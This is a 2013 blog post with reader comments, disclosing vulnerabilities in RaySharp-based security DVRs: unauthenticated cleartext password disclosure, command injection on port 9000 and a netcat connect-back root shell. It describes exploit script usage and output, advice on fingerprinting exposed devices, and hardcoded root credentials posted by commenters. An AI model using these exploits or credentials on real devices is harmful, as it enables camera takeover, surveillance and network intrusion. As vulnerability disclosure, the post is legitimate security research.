Tuesday, January 22, 2013

Swann Song - DVR Insecurity

"Swan song" is a metaphorical phrase for a final gesture, effort, or performance given just before death or retirement. This post serves as the "swan song" for a whole slew of DVR security systems. With that being said, I will refer to the lyrical master MC Hammer, lets turn this mutha' out.

I recently had a chance to get my hands on a 4 channel DVR system system sold under a handful of company banners (4/8/16 channels) - Swann, Lorex, Night Owl, Zmodo, URMET, kguard security, etc. A few device model numbers are - DVR04B, DVR08B, DVR-16CIF, DVR16B
After firing up the device and putting it on the network I noticed that it was running a telnet server, unfortunately the device does not appear to come configured with an easy/weak login :(. Time to open it up and see whats going on :)

After opening the device up something grabbed my attention right away....

The highlighted header looked like a pretty good possibility for a serial port, time to break out the multi-meter and check. After a couple power cycles, the header was indeed a serial port :)

After hooking up my usb to serial breakout board to the device serial port and guessing at the following serial settings: 115200 8-N-1 , I was stuck looking at a login prompt without a working login or password.

Lucky for me the device startup can be reconfigured using the u-boot environment. The environment variable "bootargs" can be adjusted to boot the linux system into single user mode by appending "single" to the end of the existing settings:
setenv bootargs mem=68M console=ttyAMA0,115200 root=1f01 rootfstype=jffs2 mtdparts=physmap-flash.0:4M(boot),12M(rootfs),14M(app),2M(para) busclk=220000000 single



This change to the bootargs variable is only temporary at this point, if we were to power cycle the device the change would be lost. It is possible to write these changes to the device, but in this case we only want to boot into single user mode once. To boot the device you need to tell the boot loader where the kernel exists in memory, this value can be found in the default environment variable “bootdcmd”.


Once the device is booted up in single user mode, the root password can be reset and the device can be rebooted. Telnet now works, but what fun is that when these devices don't normally expose telnet to the internet :). Now for the real fun...looking at the device the default configuration is setup to auto-magically use the power of the dark lord satan (uPnP) to map a few ports on your router (if it supports uPnP). One of the ports that it will expose is for the web (activeX) application and the other is the actual comms channel the device uses (port 9000). The first item I looked at was the web application that is used to view the video streams remotely and configure the device. The first thing that I found with this lovely device is that the comms channel (9000) did not appear to do any authentication on requests made to it...Strike 1. I imagine the activeX application that is used to connect to the device could be patched to just skip the login screen, but that seems like a lot of work, especially when there are much easier ways in. The next thing I saw was a bit shocking...when you access the application user accounts page the device sends the application all the information about the accounts stored on the device. This includes the login and password. In clear text. Strike 2. I created a small PoC in python that will pull the password from a vulnerable device:
python getPass.py 192.168.10.69
[*]Host: 192.168.10.69
[+]Username: admin
[+]Password: 123456
Script can be found here.

After owning the device at the "application" level, I figured it was time to go deeper.

Port 9000 is run by a binary named 'raysharpdvr'. I pulled the binary off the device and started going through it looking for interesting stuff. First thing I noticed was the device was using the "system" call to carry out some actions, after chasing down these calls and not seeing much, the following popped up:


"sprintf" with user input into a "system", that'll do it. Couple problems to overcome with this. First in order to use this vector for command injection you must configure the device to use "ppp" - this will cause the device to go offline and we will not be able to interact with it further :(. We can get around this issue by injecting a call to the dhcp client appliction ("udhcpc") - this will cause the device to use dhcp to get its network information bypassing the previous "ppp" config. The other issue is once we have reconfigured the device to run our command, it needs to be restarted before it will execute (its part of the init scripts). The application does not actually provide a way to reboot the device using the web interface, there is a section that says 'reboot', but when it is triggered nothing happens and some debugging information displayed in the serial console saying the functionality is not implemented. Lucky for us there are plenty of overflow bugs in this device that will lead to a crash :). The device has a watchdog that polls the system to check if the "raysharpdvr" application is running and if it does not see it, it initiates a system reboot - very helpful. With those two issues out of the way the only thing left is HOW to talk to our remote root shell that is waiting for us....luckily the device ships with netcat built into busybox, -e flag and all :)
Usage: sploit.py <target> <connectback host> <connectback port>
$ python sploit.py 192.168.10.69 192.168.10.66 9999
[*]Sending Stage 1
[*]Sending Stage 2
[*]Rebooting the server with crash....
Ncat: Version 5.21 ( http://nmap.org/ncat )
Ncat: Listening on 0.0.0.0:9999
Strike 3, get this weak shit off my network. The script can be found here. The script relies on the web application running on port 80, this is not always the case so you may need to adjust the script to fix if your device listens on another port. It is also worth noting that it may take a few minutes for the device to reboot and connect back to you.
Unfortunately the web server that runs on this device does not behave correctly (no response headers) so I do not believe finding these online is as easy as searching shodan, however it is possible to fingerprint vulnerable devices by looking for hosts with port 9000 open.

tl;dr; A whole slew of security dvr devices are vulnerable to an unauthenticated login disclosure and unauthenticated command injection.

58 comments:

  1. Awesome post. Was this vuln reported? I am looking for a vuln ID to reference the login disclosure.

    ReplyDelete
  2. Neat write-up! We're looking to add these issues to OSVDB.org and wanted to clarify a few things.

    1." when you access the application user accounts page the device sends the application all the information about the accounts stored on the device. This includes the login and password. In clear text." You say "page" but the script doesn't appear to access a page in the sense of a web page. Can you clarify if there is a page/script that is used?

    2. The issue above, along with command injection via Port 9000 / udhcpc, and the remote overflow dos to trigger reboot, seem like the 3 main issues. Does that sound right?

    Thanks!

    ReplyDelete
    Replies
    1. 1) The "page" is actually just an activeX control that is loaded when the user visits whatever port the "web" viewer is configured for (default 80) - the activeX control then talks to the device via port 9000 behind the scenes.

      2) Yes - although I believe there are more issues to be found in these devices.

      Delete
  3. 1) Happen to know the ActiveX control name/file?

    2) I do not doubt that one bit =)

    Thanks!

    ReplyDelete
    Replies
    1. HiDvrOcx.cab - contains all of the controls used by these devices, as I recall the page loads "DvrOcx.ocx". I no longer have the device so I cannot confirm.

      Delete
  4. So, if you can hack the console of a Swann DVR, how the hell can I get the video streams out of it without using their stupid Safari/IE only web GUI?

    ReplyDelete
    Replies
    1. I'm not positive, but my guess is they expose their video streams as some RTSP channel that you could simply play using VLC. RTSP has basic and digest authentication; my guess is this blog post pretty much outlines everything you would ever need to pull video from the device outside of their web UI.

      Delete
    2. I'm looking to get access to the video via RTSP, or something similar as well. I used Lineshark to sniff a few packets and can see where the initial HTTP request comes in, but then it appears things are handed off to the ActiveX control immediately and from there all the communication is happening in TCP. In one of the TCP packets after I have logged in via ActiveX, I can see my username/password in the packet contents. From there there are a bunch of packets going back and forth in TCP, but I cannot figure out what to do from here. I need to find a URL to pass to VLC, but I don't see anything of the sort after the ActiveX takes over. Ideas?

      Delete
    3. Just noticed the thead below by Damo on April 7th that starts to cover this. I'm hoping to get access to the video w/o the need for this stupid Activex control.

      Delete
    4. Hi Woodchuck - get in touch with me (Damo) if you're still interested in this stuff - I have made some more progress on several fronts with regards to these things - me@damow.net

      Delete
  5. Oh God, when IT boffins try to look smart in PhySec :)

    What is there really to exploit in a DVR?

    It does not secure anything (despite the implication, a DVR is not a security system in classical sense, since it's not preventive).

    Cheap 4channel DVR like the one you describe -- -- it's typical usage (from my 10 years in the industry as an integrator expereience) is:

    a) quad live view of 4 cameras around your house
    b) looking at what your empleyees are doing.

    In both cases, physical access to the room in which the DVR typically gets installed means DVR compromising is the least of your problems.

    The other issue is tad more serious (you can inject code into the client computer looking at DVR). But web viewer's purpose is to gain access to your video stream from an insecure location (internet cafe, tho it might be users laptop). Any security integrator worth it's salt will advise specialized app (CCTV Client) to connect to the video data stream directly, if nothing than to avoid using IE.

    In other words, while your observation is factually correct, it's of very little practical value.

    ReplyDelete
    Replies
    1. "What is there really to exploit in a DVR? "

      If the DVR is connected to the outside internet, then random joes from the internet can trivially break into the device, take it over, and from there hop onto anything else on your local network.

      That's what.

      Delete
    2. Fair enough. I missed that it's the video stream port that you can gain shell access through (as this is typically the only port we leave open on DVRs we install).

      Will check this against some Linux based devices I deal with.

      Delete
    3. Okay, here's a hypothetical: I war-drive around the neighborhood, looking for networks that are open or using wep (crackable). Once I get on the network, I look for these surveillance systems.

      I get access to the video streams.

      After I do this, I know when you're home and when you aren't; I'm free to rob you at my leisure.

      Delete
    4. Bojan, unfortunately you're not a good security expert.

      Just because you can't see it as a problem that doesn't prove it isn't.

      Please remove your head, and understand the big picture, that you don't know everything about every situation....

      For instance, I'm pretty sure everyone using one of these has a reason to monitor whatever it's looking at. Just turning off that monitoring before/after the crime makes that crime easier to commit without being caught.

      Obviously, the video itself may expose other secrets - who wouldn't point a camera at the main door? Where's the coded alarm keypad? Yeah, by the door.
      Now you can break in, without being recorded, and turn off the alarm. Sweet.

      Oh, and if it's a shop, grab the printed credit card receipts, because the CCTV probably recorded a few customers entering their PIN, and those card receipts are nicely timestamped, just like the video.

      Etc. etc. etc.

      Delete
    5. A perfect example is how China hacked the US chamber of commerce and even a thermostat used there was communicating to China

      Delete
    6. "because the CCTV probably recorded a few customers entering their PIN"

      what can you do with a PIN and a receipt?

      Delete
  6. ^^^^

    My point exactly "Bojan" couldnt have said it better.

    ReplyDelete
  7. I tried this technique on my Lorex device, and sure enough it works. More worryingly, if I look at the entire stream of data heading out from the DVR (the quick way is to just add a "print a" statement to your python script), I found the username and password (in plain text) for my email address. Why was it there? Because you can enter both in the device's settings, along with your outgoing mail server, and have it email you alerts. Stupid me for trusting a consumer-grade black box with my email password.

    One changed password later, I also disabled port forwarding from my modem/router to the Lorex box (handy for viewing the cameras with my smartphone). Now the device is reachable ONLY from inside my network. This means to see the camera streams from outside the network I first have to establish a VPN connection back. It's an extra, annoying step, but if you feel you need to access your camera from outside your network, I highly recommend it.

    ReplyDelete
  8. Been trying to crack the hashed password I grabbed off a Swann DVR for about a week now but only processing about 6k c/s so it's slow going. The password is stored unsalted in a MD5 hash. You can grab the passwd file using vulnerability in path navigation against the web server. Lame.

    ReplyDelete
  9. Ooops, Maplin in the UK sell a lot of these Swann DVRs:

    http://www.maplin.co.uk/swann-house

    Great writup for generic 'how to r00t your cheapo smart home device.

    ReplyDelete
  10. I get:
    C:\PYTHON33>getPass.py 192.168.10.69
    File "C:\Python33\getPass.py", line 1
    import socket,binascii,sys,re t1 =
    ^
    SyntaxError: invalid syntax

    We have over 50 of these in our company and need to see if we have this exploit. They are behind a firewall but still..

    I get the same message with the dvrown.py

    ReplyDelete
    Replies
    1. This comment has been removed by the author.

      Delete
    2. This comment has been removed by the author.

      Delete
    3. batona, did you ever figure out the problem with this? I'm getting the exact same errors you are.

      Delete
  11. This comment has been removed by the author.

    ReplyDelete
  12. Thanks for the great article... proved useful for gaining access to the cmd prompt of my Night Owl Zeus DVR16B.
    My goal was to gain cmd access so i can look for a static picture url for the various cameras for integration into HSTouch from HomeSeer... see the whole thread over at http://cocoontech.com/forums/topic/23488-video-surveillance-blue-iris-and-homeseerhstouch-or-ipcameras/page-2#entry189744

    ReplyDelete
  13. Actually I have only one question — about the strange hex string with a lot of nulls that you assigned to the t1 variable. Would you be so kind to tell where do you get it from? You wrote that you merely opened 'the application user account page', but I didn't manage to find even any similar string in traffic to the 9000 port, when I tried various options of the DVR menu within the ActiveX element. The only message I spotted began with 'REMOTE HI_SRDK_SYS_USERMNG_GetUserList', but I didn't manage to receive a desired reply when I sent it directly to the port without any prelude. But your exploit worked on that device.

    ReplyDelete
  14. Oh, yeah, this vulnerability. Back in Dec 2011, I reported it to the vendor with a strong request to forward it to the OEM (which I seem to recall is Zhuhai RaySharp Technology Co., Ltd). My bug report included nicely annotated tcpdumps and everything. Here's the response I received:

    ReplyDelete
  15. Security is the one of the best thing which always give you a sense of Ultra security and protection against the internal as well as external factor
    home security service
    home security solution

    ReplyDelete
  16. See my post: http://www.damow.net/2012/12/14/digging-into-dvrs/

    I have a proof of concept that can recover passwords for another variety of these things over the network.

    ReplyDelete
  17. Hello !
    Can you give me an email address to talk to you in private please ? (someLuser)
    I've a problem with the content of your blog.
    Thanks you !

    ReplyDelete
  18. It seems some of the ZMODO machines have fixed some of these bugs (pre-authentication retrieval of passwords to name one). however, i am trying to boot into single user mode similar to how you did it, and noticed that it just will load the kernel and not show anything after that. do you think it could be some kind of mod they did so people cant boot into it? i was reading some translated chinese pages on google and they mentioned that it was being fixed.

    ReplyDelete
  19. so has anyone been able to get an rtsp stream outa these boxs ?

    ReplyDelete
  20. Does anyone know if on telnet to the swann DVR does it allow for browsing the file system + recordings?
    If I take the drive out and plug it in an external SATA reader the drive is not recognizable by Windows so I was wondering if telnet allows the full viewing of the OS + data stored on the drive?

    ReplyDelete
    Replies
    1. Yes, I can see the attached hard drive and video files on it, while telnetting into the router. They don't have a standard extension though.

      Delete
  21. I'd like to thank you for your insight and (very) blunt assessment of these DVRs. I own one, (but was lucky enough to have a "firmware" without the 1234-esque password).

    Strangely enough, I used your instructions for a 100% white-hat purpose: To change the root password so I may shut the system down cleanly via telnet in the event of a power failure.

    The not-so wonderful support folks at (company here) told me, in no uncertain terms, that telnet and SSH was not available and did not exist on their product (mind you, I was sending the question while staring at the login prompt in Putty...). All I wanted to do was shut it down. I didn't care about the method, be it Telnet, SSH, SOAP, etc...

    Using your instructions, I was able to set a new root password, and can now have my UPS-equipped server issue all the halt/poweroff/restart commands I'd like, and don't have to worry about the drive safely being unmounted in the even of a power failure.

    Now, I'm off to try to SSL Wrapper this thing to take care of the rest of its issues...

    ReplyDelete
  22. So has anyone been able to get the direct stream link/URl off these DVR's? Or is it impossible?

    ReplyDelete
  23. I found your blog when I was looking for a different sort of information but I was very happy and glad to read through your blog. The information available here is great

    4ch DVR kit and 8ch DVR kit

    ReplyDelete
  24. I'm not a computer expert or anything, but I have questions I hope someone here can answer. My friend has a Swann DVR system. I helped her install it. It worked fine at first, then things went south. Now when watching the playback, the video will randomly loop backwards at eerily convenient times. The playback footage has also begun to black out for 1-2 minute intervals, leaving large gaps of time unviewable. I thought the blackouts could be something up with the whole system, but it only happens to the cameras individually (and both of them do it) rather than both going down at once...so I don't think it's the camera itself, unless both are defective. After that went on for a while, the remote access to the DVR stopped working entirely. Someone had changed the port number the DVR uses which fucked with the remote access, and it definitely wasn't us. So, my question is thus: If someone were to gain access to the DVR (the people in question HAVE had physical access to the DVR box), would it be possible for them to actually modify the footage, or perhaps gain control of the cameras remotely to cause those blackouts? I just want to figure out if her system has possibly been compromised, because she is trying to gain proof of some fucked up shit with video footage and the playback is unreliable. One of the people who would be capable of doing this retired from the NSA after 20 years, so I have no doubt he would be able to pull it off if it's possible. Just unsure of what all could be done with the kind of access you describe here. Sorry this is sort of off topic, but I don't really know where else to find out what sort of manipulation is possible. Swann's tech support is pretty much useless. Thanks to anyone who can help.

    ReplyDelete
  25. If you continue looking at the raysharp_dvr binary, you will also find a few hardcoded passwords -- ROOT:topsecret (not kidding), rsroot:rs5678. The firmware (unpackable using firmware mod kit) also contains a couple of hashes for the root accounts, one of which is DES and resolves to root:helpme, the other is MD5 (not in dictionary, varies by DVR).

    I am deciding whether i should return this DVR or rewrite its firmware. The current firmware appears like it was written by a bunch of monkeys. Also ActiveX-only, really? Too bad because hardware seems to be solid (it is built around HiSilicon's HI35zxx ARM CPU)

    ReplyDelete
  26. Has anyone managed to view the video stream without using the supplied software please?

    ReplyDelete
  27. Is there an updated location for the dvrown.py script? I'm trying to get into my night-owl, but I cannot find the script anywhere.

    Thanks

    ReplyDelete
  28. uperb posts with lots of information!!! This is really the most miraculous blog site dude….
    cabling services ct

    ReplyDelete
  29. As a consumer looking for a security DVR for the home, what are some brand names to look into that are NOT using the RaySharp software, and are known to have highly secure firmware.

    ReplyDelete
  30. The video stream is initiated by connecting to port 9000 and sending it 16 bytes. All the bytes appear to be zero (00) except for bytes 5 and 13. 5 is always the same 0x47 and Byte 13 is the one that selects which camera to stream. For camera number one byte 13 = 0xA4. I wrote a perl script that will listen on a port and when a client connects it will connect to the dvr, send the 16 bytes and start streaming the output to the connected client. I am unable to get vlc to connect. I wrote another script to dump the output from the stream to a file and tried to play it with vlc and it would not play. I marked it as avi and tried to play with windows media player and it did sort of play and I could see the top 1/10th of the screen. I'll need to keep playing with it. If anyone else has any info on how to play it please post.

    ReplyDelete
  31. What type of serial breakout board did you use? I could only get mine to show garbled text.

    ReplyDelete
    Replies
    1. FTDI breakout - https://www.sparkfun.com/products/9716

      Delete
  32. Not sure if the manufacturer fixed this specific vulnerability, but I noticed a firmware update hidden away on their website:

    http://swann.com/downloads/New_FTP/Name/

    I updated my DVR8-4000 to the latest release available, then tried the python script. I had to mod the script to use my port, instead of the default 9000. The result is "No reply, not vuln." I only wish I had tried this on the original firmware before upgrading. If anyone tries the script, then updates firmware, I'd be curious to hear the before/after result.

    ReplyDelete
    Replies
    1. Oh boy. Just poking around, I telneted into the router and logged in as root with no password. Good grief. Trying to change the password to something, anything, I get "passwd: An error occurred updating the password file." Any ideas why it's doing that?

      Delete
    2. If I vi /etc/passwd, and try to save a password that way, I get a message that the file system is read-only. Any ideas on how to get a root password now? Sorry to newb up the thread. I'm a bit of a linux rookie.

      Delete
  33. http://esyncsecurity.com ....Very nice info...

    ReplyDelete
  34. Arggg.........Faint... very scare to read the command, I rather hire the expert to do for me..... DVR Cameras

    ReplyDelete
  35. Thank for sharing such a informative blog, i like it so much. Security Systems

    ReplyDelete